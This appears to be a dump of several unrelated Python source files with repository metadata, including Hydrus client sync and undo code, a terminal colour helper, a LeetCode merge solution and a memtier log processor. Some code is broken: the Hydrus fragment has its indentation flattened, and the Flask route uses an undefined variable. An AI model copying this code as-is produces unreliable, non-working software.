HydrusGlobals.client_controller.CurrentlyIdle(): break else: if stop_time is not None and HydrusData.TimeHasPassed( stop_time ): break if options[ 'pause_repo_sync' ]: break ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: break subupdate_index_string = 'content update ' + HydrusData.ConvertValueRangeToPrettyString( subindex + 1, subindex_count ) + ': ' path = ClientFiles.GetExpectedContentUpdatePackagePath( self._service_key, self._info[ 'next_processing_timestamp' ], subindex ) if not os.path.exists( path ): self._ReportSyncProcessingError( path, 'was missing' ) return job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'loading from disk' ) with open( path, 'rb' ) as f: obj_string = f.read() job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'parsing' ) try: content_update_package = HydrusSerialisable.CreateFromString( obj_string ) except: self._ReportSyncProcessingError( path, 'did not parse' ) return HydrusGlobals.client_controller.pub( 'splash_set_title_text', self._name + ' - ' + update_index_string + subupdate_index_string ) job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'processing' ) ( did_it_all, c_u_p_weight_processed ) = HydrusGlobals.client_controller.WriteSynchronous( 'content_update_package', self._service_key, content_update_package, job_key, only_when_idle ) total_content_weight_processed += c_u_p_weight_processed if not did_it_all: processing_went_ok = False break HydrusGlobals.client_controller.WaitUntilPubSubsEmpty() if options[ 'pause_repo_sync' ]: break ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: break if processing_went_ok: job_key.SetVariable( 'popup_text_2', 'committing service updates' ) service_updates = [ service_update for service_update in service_update_package.IterateServiceUpdates() ] service_updates.append( HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_NEXT_PROCESSING_TIMESTAMP, service_update_package.GetNextBegin() ) ) service_keys_to_service_updates = { self._service_key : service_updates } self.ProcessServiceUpdates( service_keys_to_service_updates ) HydrusGlobals.client_controller.Write( 'service_updates', service_keys_to_service_updates ) HydrusGlobals.client_controller.pub( 'notify_new_pending' ) HydrusGlobals.client_controller.WaitUntilPubSubsEmpty() job_key.SetVariable( 'popup_gauge_2', ( 0, 1 ) ) job_key.SetVariable( 'popup_text_2', '' ) num_updates_processed += 1 time.sleep( 0.1 ) job_key.DeleteVariable( 'popup_gauge_1' ) job_key.DeleteVariable( 'popup_text_2' ) job_key.DeleteVariable( 'popup_gauge_2' ) if self._service_type == HC.FILE_REPOSITORY and self.CanDownload(): HydrusGlobals.client_controller.pub( 'splash_set_status_text', 'reviewing thumbnails' ) job_key.SetVariable( 'popup_text_1', 'reviewing existing thumbnails' ) thumbnail_hashes_i_have = ClientFiles.GetAllThumbnailHashes() job_key.SetVariable( 'popup_text_1', 'reviewing service thumbnails' ) thumbnail_hashes_i_should_have = HydrusGlobals.client_controller.Read( 'thumbnail_hashes_i_should_have', self._service_key ) thumbnail_hashes_i_need = thumbnail_hashes_i_should_have.difference( thumbnail_hashes_i_have ) if len( thumbnail_hashes_i_need ) > 0: def SaveThumbnails( batch_of_thumbnails ): job_key.SetVariable( 'popup_text_1', 'saving thumbnails to database' ) HydrusGlobals.client_controller.WriteSynchronous( 'thumbnails', batch_of_thumbnails ) HydrusGlobals.client_controller.pub( 'add_thumbnail_count', self._service_key, len( batch_of_thumbnails ) ) thumbnails = [] for ( i, hash ) in enumerate( thumbnail_hashes_i_need ): if options[ 'pause_repo_sync' ]: break ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: break job_key.SetVariable( 'popup_text_1', 'downloading thumbnail ' + HydrusData.ConvertValueRangeToPrettyString( i, len( thumbnail_hashes_i_need ) ) ) job_key.SetVariable( 'popup_gauge_1', ( i, len( thumbnail_hashes_i_need ) ) ) request_args = { 'hash' : hash.encode( 'hex' ) } thumbnail = self.Request( HC.GET, 'thumbnail', request_args = request_args ) thumbnails.append( ( hash, thumbnail ) ) if i % 50 == 0: SaveThumbnails( thumbnails ) thumbnails = [] HydrusGlobals.client_controller.WaitUntilPubSubsEmpty() if len( thumbnails ) > 0: SaveThumbnails( thumbnails ) job_key.DeleteVariable( 'popup_gauge_1' ) HydrusGlobals.client_controller.pub( 'splash_set_status_text', '' ) job_key.SetVariable( 'popup_title', 'repository synchronisation - ' + self._name + ' - finished' ) updates_text = HydrusData.ConvertIntToPrettyString( num_updates_downloaded ) + ' updates downloaded, ' + HydrusData.ConvertIntToPrettyString( num_updates_processed ) + ' updates processed' if self._service_type == HC.TAG_REPOSITORY: content_text = HydrusData.ConvertIntToPrettyString( total_content_weight_processed ) + ' mappings added' elif self._service_type == HC.FILE_REPOSITORY: content_text = HydrusData.ConvertIntToPrettyString( total_content_weight_processed ) + ' files added' job_key.SetVariable( 'popup_text_1', updates_text + ', and ' + content_text ) print( job_key.ToString() ) time.sleep( 3 ) job_key.Delete() except Exception as e: job_key.Cancel() print( traceback.format_exc() ) HydrusData.ShowText( 'Failed to update ' + self._name + ':' ) HydrusData.ShowException( e ) time.sleep( 3 ) def ToTuple( self ): return ( self._service_key, self._service_type, self._name, self._info ) class ServicesManager( object ): def __init__( self ): self._lock = threading.Lock() self._keys_to_services = {} self._services_sorted = [] self.RefreshServices() HydrusGlobals.client_controller.sub( self, 'RefreshServices', 'notify_new_services_data' ) def GetService( self, service_key ): with self._lock: try: return self._keys_to_services[ service_key ] except KeyError: raise HydrusExceptions.NotFoundException( 'That service was not found!' ) def GetServices( self, types = HC.ALL_SERVICES ): with self._lock: return [ service for service in self._services_sorted if service.GetServiceType() in types ] def RefreshServices( self ): with self._lock: services = HydrusGlobals.client_controller.Read( 'services' ) self._keys_to_services = { service.GetServiceKey() : service for service in services } compare_function = lambda a, b: cmp( a.GetName(), b.GetName() ) self._services_sorted = list( services ) self._services_sorted.sort( cmp = compare_function ) class Shortcuts( HydrusSerialisable.SerialisableBaseNamed ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_SHORTCUTS SERIALISABLE_VERSION = 1 def __init__( self, name ): HydrusSerialisable.SerialisableBaseNamed.__init__( self, name ) self._mouse_actions = {} self._keyboard_actions = {} def _ConvertActionToSerialisableAction( self, action ): ( service_key, data ) = action if service_key is None: return [ service_key, data ] else: serialisable_service_key = service_key.encode( 'hex' ) return [ serialisable_service_key, data ] def _ConvertSerialisableActionToAction( self, serialisable_action ): ( serialisable_service_key, data ) = serialisable_action if serialisable_service_key is None: return ( serialisable_service_key, data ) # important to return tuple, as serialisable_action is likely a list else: service_key = serialisable_service_key.decode( 'hex' ) return ( service_key, data ) def _GetSerialisableInfo( self ): serialisable_mouse_actions = [] for ( ( modifier, mouse_button ), action ) in self._mouse_actions.items(): serialisable_action = self._ConvertActionToSerialisableAction( action ) serialisable_mouse_actions.append( ( modifier, mouse_button, serialisable_action ) ) serialisable_keyboard_actions = [] for ( ( modifier, key ), action ) in self._keyboard_actions.items(): serialisable_action = self._ConvertActionToSerialisableAction( action ) serialisable_keyboard_actions.append( ( modifier, key, serialisable_action ) ) return ( serialisable_mouse_actions, serialisable_keyboard_actions ) def _InitialiseFromSerialisableInfo( self, serialisable_info ): ( serialisable_mouse_actions, serialisable_keyboard_actions ) = serialisable_info self._mouse_actions = {} for ( modifier, mouse_button, serialisable_action ) in serialisable_mouse_actions: action = self._ConvertSerialisableActionToAction( serialisable_action ) self._mouse_actions[ ( modifier, mouse_button ) ] = action self._keyboard_actions = {} for ( modifier, key, serialisable_action ) in serialisable_keyboard_actions: action = self._ConvertSerialisableActionToAction( serialisable_action ) self._keyboard_actions[ ( modifier, key ) ] = action def ClearActions( self ): self._mouse_actions = {} self._keyboard_actions = {} def DeleteKeyboardAction( self, modifier, key ): if ( modifier, key ) in self._keyboard_actions: del self._keyboard_actions[ ( modifier, key ) ] def DeleteMouseAction( self, modifier, mouse_button ): if ( modifier, mouse_button ) in self._mouse_actions: del self._mouse_actions[ ( modifier, mouse_button ) ] def GetKeyboardAction( self, modifier, key ): if ( modifier, key ) in self._keyboard_actions: return self._keyboard_actions[ ( modifier, key ) ] else: return None def GetMouseAction( self, modifier, mouse_button ): if ( modifier, mouse_button ) in self._mouse_actions: return self._mouse_actions[ ( modifier, mouse_button ) ] else: return None def IterateKeyboardShortcuts( self ): for ( ( modifier, key ), action ) in self._keyboard_actions.items(): yield ( ( modifier, key ), action ) def IterateMouseShortcuts( self ): for ( ( modifier, mouse_button ), action ) in self._mouse_actions.items(): yield ( ( modifier, mouse_button ), action ) def SetKeyboardAction( self, modifier, key, action ): self._keyboard_actions[ ( modifier, key ) ] = action def SetMouseAction( self, modifier, mouse_button, action ): self._mouse_actions[ ( modifier, mouse_button ) ] = action HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_SHORTCUTS ] = Shortcuts class UndoManager( object ): def __init__( self ): self._commands = [] self._inverted_commands = [] self._current_index = 0 self._lock = threading.Lock() HydrusGlobals.client_controller.sub( self, 'Undo', 'undo' ) HydrusGlobals.client_controller.sub( self, 'Redo', 'redo' ) def _FilterServiceKeysToContentUpdates( self, service_keys_to_content_updates ): filtered_service_keys_to_content_updates = {} for ( service_key, content_updates ) in service_keys_to_content_updates.items(): filtered_content_updates = [] for content_update in content_updates: ( data_type, action, row ) = content_update.ToTuple() if data_type == HC.CONTENT_TYPE_FILES: if action in ( HC.CONTENT_UPDATE_ADD, HC.CONTENT_UPDATE_DELETE, HC.CONTENT_UPDATE_UNDELETE, HC.CONTENT_UPDATE_RESCIND_PETITION ): continue elif data_type == HC.CONTENT_TYPE_MAPPINGS: if action in ( HC.CONTENT_UPDATE_RESCIND_PETITION, HC.CONTENT_UPDATE_ADVANCED ): continue else: continue filtered_content_update = HydrusData.ContentUpdate( data_type, action, row ) filtered_content_updates.append( filtered_content_update ) if len( filtered_content_updates ) > 0: filtered_service_keys_to_content_updates[ service_key ] = filtered_content_updates return filtered_service_keys_to_content_updates def _InvertServiceKeysToContentUpdates( self, service_keys_to_content_updates ): inverted_service_keys_to_content_updates = {} for ( service_key, content_updates ) in service_keys_to_content_updates.items(): inverted_content_updates = [] for content_update in content_updates: ( data_type, action, row ) = content_update.ToTuple() inverted_row = row if data_type == HC.CONTENT_TYPE_FILES: if action == HC.CONTENT_UPDATE_ARCHIVE: inverted_action = HC.CONTENT_UPDATE_INBOX elif action == HC.CONTENT_UPDATE_INBOX: inverted_action = HC.CONTENT_UPDATE_ARCHIVE elif action == HC.CONTENT_UPDATE_PEND: inverted_action = HC.CONTENT_UPDATE_RESCIND_PEND elif action == HC.CONTENT_UPDATE_RESCIND_PEND: inverted_action = HC.CONTENT_UPDATE_PEND elif action == HC.CONTENT_UPDATE_PETITION: inverted_action = HC.CONTENT_UPDATE_RESCIND_PETITION ( hashes, reason ) = row inverted_row = hashes elif data_type == HC.CONTENT_TYPE_MAPPINGS: if action == HC.CONTENT_UPDATE_ADD: inverted_action = HC.CONTENT_UPDATE_DELETE elif action == HC.CONTENT_UPDATE_DELETE: inverted_action = HC.CONTENT_UPDATE_ADD elif action == HC.CONTENT_UPDATE_PEND: inverted_action = HC.CONTENT_UPDATE_RESCIND_PEND elif action == HC.CONTENT_UPDATE_RESCIND_PEND: inverted_action = HC.CONTENT_UPDATE_PEND elif action == HC.CONTENT_UPDATE_PETITION: inverted_action = HC.CONTENT_UPDATE_RESCIND_PETITION ( tag, hashes, reason ) = row inverted_row = ( tag, hashes ) inverted_content_update = HydrusData.ContentUpdate( data_type, inverted_action, inverted_row ) inverted_content_updates.append( inverted_content_update ) inverted_service_keys_to_content_updates[ service_key ] = inverted_content_updates return inverted_service_keys_to_content_updates def AddCommand( self, action, *args, **kwargs ): with self._lock: inverted_action = action inverted_args = args inverted_kwargs = kwargs if action == 'content_updates': ( service_keys_to_content_updates, ) = args service_keys_to_content_updates = self._FilterServiceKeysToContentUpdates( service_keys_to_content_updates ) if len( service_keys_to_content_updates ) == 0: return inverted_service_keys_to_content_updates = self._InvertServiceKeysToContentUpdates( service_keys_to_content_updates ) if len( inverted_service_keys_to_content_updates ) == 0: return inverted_args = ( inverted_service_keys_to_content_updates, ) else: return self._commands = self._commands[ : self._current_index ] self._inverted_commands = self._inverted_commands[ : self._current_index ] self._commands.append( ( action, args, kwargs ) ) self._inverted_commands.append( ( inverted_action, inverted_args, inverted_kwargs ) ) self._current_index += 1 HydrusGlobals.client_controller.pub( 'notify_new_undo' ) def GetUndoRedoStrings( self ): with self._lock: ( undo_string, redo_string ) = ( None, None ) if self._current_index > 0: undo_index = self._current_index - 1 ( action, args, kwargs ) = self._commands[ undo_index ] if action == 'content_updates': ( service_keys_to_content_updates, ) = args undo_string = 'undo ' + ConvertServiceKeysToContentUpdatesToPrettyString( service_keys_to_content_updates ) if len( self._commands ) > 0 and self._current_index < len( self._commands ): redo_index = self._current_index ( action, args, kwargs ) = self._commands[ redo_index ] if action == 'content_updates': ( service_keys_to_content_updates, ) = args redo_string = 'redo ' + ConvertServiceKeysToContentUpdatesToPrettyString( service_keys_to_content_updates ) return ( undo_string, redo_string ) def Undo( self ): action = None with self._lock: if self._current_index > 0: self._current_index -= 1 ( action, args, kwargs ) = self._inverted_commands[ self._current_index ] if action is not None: HydrusGlobals.client_controller.WriteSynchronous( action, *args, **kwargs ) HydrusGlobals.client_controller.pub( 'notify_new_undo' ) def Redo( self ): action = None with self._lock: if len( self._commands ) > 0 and self._current_index < len( self._commands ): ( action, args, kwargs ) = self._commands[ self._current_index ] self._current_index += 1 if action is not None: HydrusGlobals.client_controller.WriteSynchronous( action, *args, **kwargs ) HydrusGlobals.client_controller.pub( 'notify_new_undo' ) def GetShortcutFromEvent( event ): modifier = wx.ACCEL_NORMAL if event.AltDown(): modifier = wx.ACCEL_ALT elif event.CmdDown(): modifier = wx.ACCEL_CTRL elif event.ShiftDown(): modifier = wx.ACCEL_SHIFT key = event.KeyCode return ( modifier, key ) class ClientServiceIdentifier( HydrusData.HydrusYAMLBase ): yaml_tag = u'!ClientServiceIdentifier' def __init__( self, service_key, service_type, name ): HydrusData.HydrusYAMLBase.__init__( self ) self._service_key = service_key self._type = service_type self._name = name def __eq__( self, other ): return self.__hash__() == other.__hash__() def __hash__( self ): return self._service_key.__hash__() def __ne__( self, other ): return self.__hash__() != other.__hash__() def __repr__( self ): return 'Client Service Identifier: ' + HydrusData.ToUnicode( ( self._name, HC.service_string_lookup[ self._type ] ) ) def GetInfo( self ): return ( self._service_key, self._type, self._name ) def GetName( self ): return self._name def GetServiceKey( self ): return self._service_key def GetServiceType( self ): return self._type
[ "hydrus.admin@gmail.com" ]
hydrus.admin@gmail.com
8303d30c8032f5f4d4810c52bb87dece4b05a65d
08a1d871f4be9ea61497751845a5ed9abe2a1012
/farbox_bucket/utils/cli_color.py
5819c5e25a1ad977f067ed1c0eba565f31526df8
[ "MIT", "LicenseRef-scancode-other-permissive" ]
permissive
itfanr/FarBox
5bfff706439a6a223f531cfa36100ac21ed4878b
daeda4f5080467f1ddf4b60424b8562f914756bd
refs/heads/master
2023-04-19T07:23:28.824231
2021-05-07T02:29:06
2021-05-07T02:29:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,422
py
#coding: utf8 from __future__ import absolute_import, print_function #CSI="\x1B[" #RED = CSI+"31;40m" #GREEN = CSI+'32;40m' #RESET =CSI+"m" FLAGS = dict( RESET = "\x1B[0m", BOLD = "\x1B[1m", DIM = "\x1B[2m", UNDER = "\x1B[4m", REVERSE = "\x1B[7m", HIDE = "\x1B[8m", CLEARSCREEN = "\x1B[2J", CLEARLINE = "\x1B[2K", BLACK = "\x1B[30m", RED = "\x1B[31m", GREEN = "\x1B[32m", YELLOW = "\x1B[33m", BLUE = "\x1B[34m", MAGENTA = "\x1B[35m", CYAN = "\x1B[36m", WHITE = "\x1B[37m", BBLACK = "\x1B[40m", BRED = "\x1B[41m", BGREEN = "\x1B[42m", BYELLOW = "\x1B[43m", BBLUE = "\x1B[44m", BMAGENTA = "\x1B[45m", BCYAN = "\x1B[46m", BWHITE = "\x1B[47m", NEWLINE = "\r\n\x1B[0m", ) def print_with_color(strings, color='red', end='\r\n'): color = FLAGS.get(color.upper()) if color: print(color + strings + FLAGS['RESET'], end=end) else: print(strings) def print_colorful_parts(string_parts, end=''): for strings, color in string_parts: print_with_color(strings, color, end) print(FLAGS['NEWLINE'], end='') if __name__ == '__main__': print_with_color('hello', 'green', end=' ') print_with_color('hello', 'blue') print_colorful_parts( [('hello', 'magenta'), ('world', 'yellow'), ('hello', 'red'), ('world', 'cyan')], end=' ' )
[ "hepochen@gmail.com" ]
hepochen@gmail.com
40ddc8421d44905539dea7b92a24c89d750a0063
294fc074131d08ad4d602d1c5dc672674b1d0cc6
/src/level/level3.py
8e07c90e43be2e812740ec9c9aa44799de09999c
[]
no_license
railsdev/treasure
8a15f757e988a86bfd52ade9c12d9b73db22c77e
603b3719c7aa14aad436b8ee7cf08c8991ac12cd
refs/heads/master
2019-01-02T08:19:37.840729
2012-05-16T21:20:10
2012-05-16T21:20:10
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,167
py
terrain = [ " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", "X X ", " X ", " X ", " X ", " X X ", " X ", " X ", " X ", " X X", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", " X ", ]
[ "nathan.stocks@gmail.com" ]
nathan.stocks@gmail.com
701af4a6dea98585d23863e6340949745d1980e6
73758dde83d1a1823c103e1a4ba71e7c95168f71
/nsd1912/py02/day02/myfunc.py
684e88105205263137758b3b560f5844088f2eac
[]
no_license
tonggh220/md_5_nsd_notes
07ffdee7c23963a7a461f2a2340143b0e97bd9e1
a58a021ad4c7fbdf7df327424dc518f4044c5116
refs/heads/master
2023-07-02T01:34:38.798929
2021-05-12T08:48:40
2021-05-12T08:48:40
393,885,415
0
0
null
null
null
null
UTF-8
Python
false
false
271
py
def func1(x): if x == 1: return 1 return x * func1(x- 1) # 5 * func1(4) # 5 * 4 * func1(3) # 5 * 4 * 3 * func1(2) # 5 * 4 * 3 * 2 * func1(1) # 5 * 4 * 3 * 2 * 1 if __name__ == '__main__': print(func1(5))
[ "zhangzg@tedu.cn" ]
zhangzg@tedu.cn
2c3ddf59ef5bbc9b91706cc3b505f3e28ba85471
1ade02a8e0c6d7e442c9d9041f15518d22da3923
/w8/mock_phase2/run/core/controllers/generic.py
4478b8a5012a51fa7a71dcc21a18532f1804d5fc
[]
no_license
fodisi/ByteAcademy-Bootcamp
7980b80636a36db6da3e0fc0e529fbc6b8e097e0
d53e3f4864f6cba1b85e806c29b01c48e3c2e81d
refs/heads/master
2020-03-19T12:55:31.489638
2018-07-25T16:19:19
2018-07-25T16:19:19
136,550,128
0
1
null
null
null
null
UTF-8
Python
false
false
285
py
#!/usr/bin/env python3 from flask import Blueprint, render_template controller = Blueprint('generic', __name__) @controller.route('/<product_name>') def home(product_name): # obj = model.get_product(product_name) return render_template('index.html', json_obj=obj.to_json)
[ "fodisi@users.noreply.github.com" ]
fodisi@users.noreply.github.com
8da80ee62fb2a9c9ee57874efa1a8a69dc421479
694d57c3e512ce916269411b51adef23532420cd
/leetcode/23merge_k_sorted_lists.py
76d8e6ea698631516ea4cfdd1e87899d4de8cc45
[]
no_license
clovery410/mycode
5541c3a99962d7949832a0859f18819f118edfba
e12025e754547d18d5bb50a9dbe5e725fd03fd9c
refs/heads/master
2021-05-16T02:46:47.996748
2017-05-10T23:43:50
2017-05-10T23:43:50
39,235,141
1
1
null
null
null
null
UTF-8
Python
false
false
1,368
py
import heapq class ListNode(object): def __init__(self, x): self.val = x self.next = None class Solution(object): def mergeKLists(self, lists): new_head = None heap = [] for node in lists: if node: heapq.heappush(heap, (node.val, node)) if heap: new_head = heapq.heappop(heap)[1] if new_head.next: heapq.heappush(heap, (new_head.next.val, new_head.next)) pre_node = new_head while heap: curr_node = heapq.heappop(heap)[1] if curr_node.next: heapq.heappush(heap, (curr_node.next.val, curr_node.next)) pre_node.next = curr_node pre_node = curr_node return new_head if __name__ == '__main__': node1 = ListNode(1) node2 = ListNode(2) node3 = ListNode(3) node4 = ListNode(4) node5 = ListNode(5) node6 = ListNode(6) node1.next = node3 node3.next = node5 node2.next = node4 node4.next = node6 sol = Solution() new_head = sol.mergeKLists([node1, node2]) print new_head.val print new_head.next.val print new_head.next.next.val print new_head.next.next.next.val print new_head.next.next.next.next.val print new_head.next.next.next.next.next.val print sol.mergeKLists([[]])
[ "seasoul410@gmail.com" ]
seasoul410@gmail.com
c9dd0b15f24487f9534251c6795772a3bbb8f2a1
162cb21fbc96e8b8ca595ee65b740624d8c8848e
/assignment01/ass1Q1.py
6ec7a93f46f3f6868b2af317c7bb5ee153d59acb
[]
no_license
BansiddhaBirajdar/python
b5766ca702a83fb3b0dab3218a00ebbabcef67f9
f4b4b6804cd05e277f9d9d486d72c50c1afb2219
refs/heads/master
2022-04-10T19:53:17.119366
2020-03-27T15:44:14
2020-03-27T15:44:14
250,241,920
0
0
null
null
null
null
UTF-8
Python
false
false
293
py
'''Program to divide two numbers''' def main(): ino1=int(input("Enter the no1::")) ino2=int(input("Enter the no2::")) if(ino2<=0): print("Please enter +ve no") return else: print("Division of ::",ino1//ino2); if __name__ == "__main__": main()
[ "bansi.birajdar7@gmail.com" ]
bansi.birajdar7@gmail.com
4b08becbc3b90a3cc500e0fe33620b6680b22c96
8b52ab06e6a767fc1e87a391ea0c2e53fff09049
/untitled/venv/bin/pip3.7
6bddfa304559245cf3253422e1f47012ccfc746a
[]
no_license
SSourceFile/pykuaishou
e96b759183d7f0a6bd0aa9262d02930a5f05700c
b1d70385dcee82956276f26319971202cd5bee5b
refs/heads/main
2023-02-20T03:40:14.709548
2021-01-20T10:41:17
2021-01-20T10:41:17
331,274,220
0
0
null
null
null
null
UTF-8
Python
false
false
406
7
#!/Users/hmh/PycharmProjects/untitled/venv/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7' __requires__ = 'pip==19.0.3' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')() )
[ "huaminghui@hzed.com" ]
huaminghui@hzed.com
046e8b44c06baf837f8880c3c055e41d60a62cb0
715f06778489ec5f7670771a1f24cc9c6e7d3803
/labber/cisco/xr_device.py
d479a8c0c9186cf2d4e58b26f15a1e281082e767
[]
no_license
xv0x7c0/labber
a04bf7fdc5c2e5c6f52da5f61c5398912dc78d74
a653af0a0d9e5ebf5b2e9420edc7726b56c7db36
refs/heads/master
2021-06-17T01:39:36.290288
2019-06-02T13:59:21
2019-06-02T13:59:21
188,347,006
0
0
null
2021-03-25T22:45:34
2019-05-24T03:35:50
Python
UTF-8
Python
false
false
713
py
import netdev from labber.device import Device class XRDevice(Device): device_type = "cisco_ios_xr" _scp_path = "disk0:/labber_replace_config.cfg" async def get_config(self): async with netdev.create(**dict(self)) as node: config = await node.send_command("show run") return [self, "\n".join(config.splitlines()[3:])] async def replace_config(self): async with netdev.create(**dict(self)) as node: await node.send_command("configure exclusive") await node.send_command("load disk0:labber_replace_config.cfg") await node.send_command("commit replace", pattern=r"\[no\]\:") await node.send_command("yes")
[ "13061441+xv0x7c0@users.noreply.github.com" ]
13061441+xv0x7c0@users.noreply.github.com
515c154e112ed44885fb11d8cfbd74d1c10c102d
1b070c5fabfe7e804eac4c7d706f6ccdf6b29ed0
/partners/migrations/0005_auto_20200620_0044.py
bfe6abd78feb964304d45149cd068cdcdae946a8
[ "MIT" ]
permissive
cZachJohnson/My-Business
ef80dae6458c2fb7a08465d29e32f9405e52e43d
792bb13a5b296260e5de7e03fba6445a13922851
refs/heads/master
2023-08-25T06:51:39.330270
2021-10-25T01:20:34
2021-10-25T01:20:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
687
py
# Generated by Django 2.2.12 on 2020-06-20 00:44 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("partners", "0004_auto_20200609_0514"), ] operations = [ migrations.AddField( model_name="partner", name="created_at", field=models.DateTimeField( auto_now_add=True, default=datetime.datetime(1970, 1, 1, 0, 0) ), preserve_default=False, ), migrations.AddField( model_name="partner", name="updated_at", field=models.DateTimeField(auto_now=True), ), ]
[ "yasserth19@gmail.com" ]
yasserth19@gmail.com
32313735f8656809d14e5f294203dbd9ffb84b68
39fa481b356c5e8df77c7459330294b30b45b845
/process_memtier_data_experiments_gets.py
3e88725c279a620969e78fd7d3d66062dbdc7554
[]
no_license
jovan-ioanis/asl-project-2017
bd32d4220b23163bcb1de7b99bfc5c852311b0b4
079b94e0119bd6d71b5ccf8ecf0ee4a085d69722
refs/heads/master
2021-04-06T20:46:30.637686
2018-06-14T10:25:56
2018-06-14T10:25:56
125,279,638
0
1
null
null
null
null
UTF-8
Python
false
false
13,996
py
""" ASL project - fall 2017 author: Jovan Nikolic Processes json log file produced by memtiers """ import json import numpy as np import csv plots_base_name = "plots/experiment_gets/" big_output_path_base_name = "aggregated_data/experiment_gets/" file_base_name = "data/experiment_gets/" csv_file_name = "client_timings_" json_file_base_name = "json_output_file_" throughput_literal = "Ops/sec" hits_literal = "Hits/sec" latency_literal = "Latency" msec_literal = "<=msec" percentage_literal = "percent" suffixes = ["sharded", "nonsharded"] # experimental setup memtier_vms = 3 memtier_instances_per_vm = 2 num_threads_per_instance = 1 virtual_clients_pt = 2 worker_threads = 64 repetitions = 3 num_keys = [1, 3, 6, 9] titles = ["response_time", "25th", "50th", "75th", "90th", "99th"] percentiles = [25.0, 50.0, 75.0, 90.0, 99.0] metrics = ["mean", "std"] tt = ["percent", "<=msec"] runtime = 90 all_data = {} def make_filename(instance, keys, rep, index, vm): chosen_suffix = suffixes[index] return file_base_name + json_file_base_name + "inst" + str(instance) + "_cpt" + str(virtual_clients_pt) + \ "_wt" + str(worker_threads) + "_rep" + str(rep) + "_S0-G10" + "_vm" + str(vm) + "_" + \ chosen_suffix + "_keys" + str(keys) + ".json" def read_jsons(): for s, suffix in enumerate(suffixes): all_data[suffix] = {} for keys in num_keys: all_data[suffix][keys] = {} for rep in range(repetitions): current_rep = rep + 1 all_data[suffix][keys][rep] = {} for vm_id in range(1, memtier_vms + 1): all_data[suffix][keys][rep][vm_id] = {} for inst in range(1, memtier_instances_per_vm + 1): path = make_filename(inst, keys, current_rep, s, vm_id) with open(path) as json_file: json_data = json.load(json_file) all_data[suffix][keys][rep][vm_id][inst] = json_data json_file.close() def process_response_time_and_percentiles(): full_data = {} for suffix in suffixes: full_data[suffix] = {} for keys in num_keys: full_data[suffix][keys] = {} for rep in range(repetitions): full_data[suffix][keys][rep] = {} resp_time = [] p_25th = [] p_50th = [] p_75th = [] p_90th = [] p_99th = [] for vm_id in range(1, memtier_vms + 1): for inst in range(1, memtier_instances_per_vm + 1): chosen_msecs = [0.0, 0.0, 0.0, 0.0, 0.0] diffs = [10000, 10000, 10000, 10000, 10000] resp_time.append(all_data[suffix][keys][rep][vm_id][inst]["ALL STATS"]["Gets"][latency_literal]) histogram = all_data[suffix][keys][rep][vm_id][inst]["ALL STATS"]["GET"] for i in range(len(histogram)): field = histogram[i] for k, percentile in enumerate(percentiles): if abs((int(field[percentage_literal]) - percentile)) < diffs[k]: diffs[k] = abs(int(field[percentage_literal]) - percentile) chosen_msecs[k] = field[msec_literal] p_25th.append(chosen_msecs[0]) p_50th.append(chosen_msecs[1]) p_75th.append(chosen_msecs[2]) p_90th.append(chosen_msecs[3]) p_99th.append(chosen_msecs[4]) print(diffs) full_data[suffix][keys][rep][titles[0]] = np.mean(np.asarray(resp_time)) full_data[suffix][keys][rep][titles[1]] = np.mean(np.asarray(p_25th)) full_data[suffix][keys][rep][titles[2]] = np.mean(np.asarray(p_50th)) full_data[suffix][keys][rep][titles[3]] = np.mean(np.asarray(p_75th)) full_data[suffix][keys][rep][titles[4]] = np.mean(np.asarray(p_90th)) full_data[suffix][keys][rep][titles[5]] = np.mean(np.asarray(p_99th)) return full_data def make_histograms(): broken_at = [] histograms = {} for suffix in suffixes: histograms[suffix] = {} for keys in num_keys: histograms[suffix][keys] = {} for rep in range(repetitions): histograms[suffix][keys][rep] = {} for vm_id in range(1, memtier_vms + 1): histograms[suffix][keys][rep][vm_id] = {} for inst in range(1, memtier_instances_per_vm + 1): histograms[suffix][keys][rep][vm_id][inst] = {} p = [] m = [] hist = all_data[suffix][keys][rep][vm_id][inst]["ALL STATS"]["GET"] xput = float(all_data[suffix][keys][rep][vm_id][inst]["ALL STATS"]["Gets"][throughput_literal]) for i in range(len(hist)): p.append(float(format(hist[i][tt[0]], '.2f')) * xput * runtime / 100) m.append(float(format(hist[i][tt[1]], '.2f'))) buckets = [] requests = [] step = 0.1 start = 0 end = start + step last_saved_jobs = 0 iter = 0 while True: if round(m[iter], 2) == round(end, 2): buckets.append(round(end, 2)) requests.append(p[iter] - last_saved_jobs) last_saved_jobs = p[iter] start = end end = start + step if round(m[iter], 2) > round(end, 2): buckets.append(round(end, 2)) requests.append(0) start = end end = start + step else: iter += 1 if iter >= len(m) or round(m[iter], 2) >= 15: broken_at.append(p[iter] * 100 / (xput * runtime)) break print("Total requests: " + str(np.sum(np.asarray(requests))) + " and via throughput: " + str(xput * runtime) + " which is " + str((xput * runtime - np.sum(np.asarray(requests))) * 100 /(xput * runtime)) + "% off") histograms[suffix][keys][rep][vm_id][inst][tt[0]] = requests histograms[suffix][keys][rep][vm_id][inst][tt[1]] = buckets print(broken_at) hist_per_rep = {} for suffix in suffixes: hist_per_rep[suffix] = {} for keys in num_keys: hist_per_rep[suffix][keys] = {} for rep in range(repetitions): hist_per_rep[suffix][keys][rep] = {} 